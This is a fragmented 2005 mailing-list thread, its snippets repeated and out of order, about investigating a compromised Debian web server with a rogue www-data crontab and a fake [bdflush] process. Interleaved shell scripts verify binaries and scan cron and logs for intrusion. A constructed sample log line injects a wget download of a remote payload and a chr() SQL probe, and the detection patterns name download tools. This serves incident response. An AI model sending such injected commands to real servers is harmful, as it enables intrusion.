Nejc Novak wrote:
So, for now I killed this process, disabled the cronjob and killed the web
server - there is no way the attacker is capable of coming back into the
server, or is there a chance that there is another backdoor installed
somewhere (chkrootkit doesn't find anything).
try also rk
Kernel root kits are very good at hiding themselves when they are
running.
The best way is to mount the hard drive in another box as /mnt or something
and run chkrootkit over it and also md5sum known hacked binaries like ls
etc.
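An added example, not code from the thread, of the offline check suggested above: with the suspect disk mounted (ideally read-only) at a mount point, every file is compared against the md5sums that dpkg recorded at install time. The mount point and the package list used for testing are assumptions.

```shell
#!/bin/sh
# Offline integrity check: compare files under a mounted suspect root
# (assumed to be e.g. /mnt, mounted read-only) with the md5sums dpkg stored
# at install time in var/lib/dpkg/info/<package>.md5sums. Only package-owned
# files are covered (conffiles are not), and the lists themselves come from
# the suspect disk, so a mismatch is evidence but a match is not proof.
#
# Prints one "MODIFIED <pkg> <path>" or "MISSING <pkg> <path>" line per
# finding; returns 0 when nothing was found, 1 otherwise.
verify_dpkg_md5sums() {
    root="${1%/}"          # mount point of the suspect disk, e.g. /mnt
    bad=0
    for list in "$root"/var/lib/dpkg/info/*.md5sums; do
        [ -f "$list" ] || continue
        pkg=$(basename "$list" .md5sums)
        # each line is "<md5>  <path relative to />"
        while read -r sum path; do
            [ -n "$path" ] || continue
            file="$root/$path"
            if [ ! -f "$file" ]; then
                echo "MISSING $pkg $path"
                bad=$((bad + 1))
                continue
            fi
            actual=$(md5sum "$file" | cut -d' ' -f1)
            if [ "$actual" != "$sum" ]; then
                echo "MODIFIED $pkg $path"
                bad=$((bad + 1))
            fi
        done < "$list"
    done
    [ "$bad" -eq 0 ]
}

# Stand-alone use against a disk mounted at /mnt:
#   verify_dpkg_md5sums /mnt
```

Where a result matters, fetch the same package version from a Debian mirror and compare against the md5sums inside that .deb rather than the copy on the suspect disk.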
> OK :)
>
> So, for now I killed this process, disabled the cronjob an
OK :)
So, for now I killed this process, disabled the cronjob and killed the web
server - there is no way the attacker is capable of coming back into the
server, or is there a chance that there is another backdoor installed
somewhere (chkrootkit doesn't find anything).
Nejc
Marcin Owsiany wrote:
Can you also define, what it does? Or what was the attacker capable of
doing with it?
Thanks..
Edward Faulkner wrote:
On Tue, Jul 26, 2005 at 04:39:20PM -0400, Edward Faulkner wrote:
It's attempting to connect to two different hosts:
Never mind that second address... that's my DNS.
On Tue, Jul 26, 2005 at 04:39:20PM -0400, Edward Faulkner wrote:
> On Tue, Jul 26, 2005 at 10:02:52PM +0200, Nejc Novak wrote:
> > Can you get any information out of this cron file? I tried creating the
> > same exec that this file creates, but obviously I was doing something wrong :)
>
> The crontab wri
On Tue, Jul 26, 2005 at 04:39:20PM -0400, Edward Faulkner wrote:
> It's attempting to connect to two different hosts:
Never mind that second address... that's my DNS...
On Tue, Jul 26, 2005 at 10:02:52PM +0200, Nejc Novak wrote:
> Can you get any information out of this cron file? I tried creating the
> same exec that this file creates, but obviously I was doing something wrong :)
The crontab writes out a binary file and executes it. I straced the
binary on a virtual m
Hi again!
I found out how the process is started. There was a file created -
/var/spool/cron/crontabs/www-data. I hope that it's OK if I post it here
as an attachment. The file was created on 21.7.2005 at 23:55. I checked the
apache logs for that time but there was nothing weird to notice.
Can you get
Re: a compromised machine
On the 12989th day after Epoch,
Nejc Novak wrote:
> I checked crontabs and I haven't found anything. But new processes started
>
> www-data 6705 0.0 0.1 1616 600 ? S 21:31 0:00 /tmp/dlciiqlno x
> www-data 6762 0.0 0.0 0 0 ?
On the 12989th day after Epoch,
Nejc Novak wrote:
> I checked crontabs and I haven't found anything. But new processes started
>
> www-data 6705 0.0 0.1 1616 600 ? S 21:31 0:00 /tmp/dlciiqlno x
> www-data 6762 0.0 0.0 0 0 ? Z 22:10 0:00 [sh]
>
> www-dat
In article <[EMAIL PROTECTED]> you wrote:
> I still haven't managed to find out how exactly this happened. And
> probably reinstall will be needed? What do you think?
Yes, a reinstall on compromised hosts is always needed; however, you should
make an image of the system for forensics, you don't want t
Reinstall seems the option left...with the added security features discussed
previously, monitoring the server closely after new installation. I would
do the new installation in a new hard disk, saving and afterwards,
installing the seemingly compromised hard disk, for a forensic analysis in
a mac
I checked crontabs and I haven't found anything. But new processes started
www-data 6705 0.0 0.1 1616 600 ? S 21:31 0:00 /tmp/dlciiqlno x
www-data 6762 0.0 0.0 0 0 ? Z 22:10 0:00 [sh]
www-data 6770 0.0 0.1 1624 608 ? S 22:10 0:00 [bdflu
On Sun, Jul 24, 2005 at 07:40:21PM +0200, Nejc Novak wrote:
> That means that the process was started at 17:31 today. So I checked
> I killed the process and webserver and at 19:31 the process again
> started with the same lines in syslog.
Check your crontabs (in various locations) and atq. It
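An added example, not from the thread, of sweeping the cron locations mentioned above for entries that run something out of a scratch directory such as /tmp; it takes a root path so it can also be pointed at a mounted suspect disk (the mount point and the sample crontab line in the test are constructed for this example).

```shell
#!/bin/sh
# Sweep every cron location under ROOT for entries whose command touches a
# world-writable scratch directory (/tmp, /var/tmp, /dev/shm). With no ROOT
# the live system is inspected; pass a mount point (assumed, e.g. /mnt) to
# inspect a suspect disk offline. Prints "<file>: <entry>" per hit and
# skips comment lines, so a commented-out path does not count.
find_suspicious_cron() {
    root="${1%/}"
    pattern='(^|[[:space:]=;])/(tmp|var/tmp|dev/shm)/'
    for f in "$root"/etc/crontab "$root"/etc/cron.d/* \
             "$root"/etc/cron.hourly/* "$root"/etc/cron.daily/* \
             "$root"/etc/cron.weekly/* "$root"/etc/cron.monthly/* \
             "$root"/var/spool/cron/crontabs/* "$root"/var/spool/cron/atjobs/*; do
        [ -f "$f" ] || continue
        grep -E "$pattern" "$f" | grep -vE '^[[:space:]]*#' | sed "s|^|$f: |"
    done
    # at(1) jobs are only listed by atq on the live host, so add them there
    if [ -z "$root" ] && command -v atq >/dev/null 2>&1; then
        atq | sed 's|^|atq: |'
    fi
}

# Stand-alone use on the live host:   find_suspicious_cron
# Against a disk mounted at /mnt:     find_suspicious_cron /mnt
```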
Thanks for your help. I didn't make much progress though. However, after
killing all these processes, a new one was run
www-data 6059 0.0 0.1 1616 600 ? S 17:31 0:00 /tmp/dlciiqlno x
That means that the process was started at 17:31 today. So I checked
logs (all virtual serv
On Sun, Jul 24, 2005 at 01:19:25PM +0200, Christoph Haas wrote:
> Since the process runs as "www-data" some kiddy has abused a web service
> on your server to download and run an external software. Look for
> suspicious log lines of your web server.
Yes ..
> Examples of hacks on our servers:
>
Christoph Haas wrote:
> On Sun, Jul 24, 2005 at 09:54:28AM +0200, Nejc Novak wrote:
> It should be rather easy finding signs of weird accesses like %20 or
> chr(). Also look for weird signs in /tmp.
>
> If your server is important you should consider reinstalling.
I'd urge you to spend the time
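An added example (not from the thread) of running the log check in the quoted advice over Apache access log lines: it percent-decodes the request field so that %20, %3b and similar encodings cannot hide a marker, then flags chr(), shell metacharacters, scratch-directory paths and download tools. The three sample lines, their RFC 5737 addresses and the URLs in them are constructed for this example.

```shell
#!/bin/sh
# Constructed sample of Apache combined-format log lines (not real traffic).
SAMPLE_LOG='198.51.100.7 - - [21/Jul/2005:23:55:02 +0200] "GET /cgi-bin/test.cgi?arg=;cd%20/tmp;wget%20http://198.51.100.7/x HTTP/1.0" 200 512 "-" "Mozilla/4.0"
203.0.113.9 - - [21/Jul/2005:23:56:10 +0200] "GET /forum.php?id=1%20OR%20chr(65)=chr(65) HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.44 - - [21/Jul/2005:23:57:33 +0200] "GET /index.html HTTP/1.1" 200 1312 "-" "Mozilla/5.0"'

# Read log lines on stdin; print "<client ip><TAB><decoded request path>"
# for every line whose request field carries a suspicious marker.
scan_access_log() {
    awk -F'"' '
    {
        req = $2                                    # METHOD PATH PROTO
        sub(/^[A-Z]+ /, "", req); sub(/ HTTP\/[0-9.]+$/, "", req)
        dec = ""                                    # percent-decode the path
        while (match(req, /%[0-9A-Fa-f][0-9A-Fa-f]/)) {
            dec = dec substr(req, 1, RSTART - 1) sprintf("%c", hex(substr(req, RSTART + 1, 2)))
            req = substr(req, RSTART + 3)
        }
        dec = dec req
        if (dec ~ /chr\(/ || dec ~ /[;|`]/ ||
            dec ~ /\/(tmp|var\/tmp|dev\/shm)\// ||
            dec ~ /(^|[^a-z])(wget|curl|ftp|lynx) /) {
            split($1, pre, " "); print pre[1] "\t" dec
        }
    }
    function hex(h,   i, v) {
        v = 0
        for (i = 1; i <= length(h); i++)
            v = v * 16 + index("0123456789abcdef", tolower(substr(h, i, 1))) - 1
        return v
    }'
}

# Stand-alone run over the sample; for a real log: scan_access_log < access.log
printf '%s\n' "$SAMPLE_LOG" | scan_access_log
```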
On Sun, Jul 24, 2005 at 09:54:28AM +0200, Nejc Novak wrote:
> I think one of my servers has been compromised. Since I don't have a lot
> of experience with these things, I beg you for your help.
>
> The information I have gathered so far is the following. The server
> is running latest debia
Hi!
I think one of my servers has been compromised. Since I don't have a lot
of experience with these things, I beg you for your help.
The information I have gathered so far is the following. The server
is running the latest Debian stable, sarge.
There was heavy traffic on the server and ps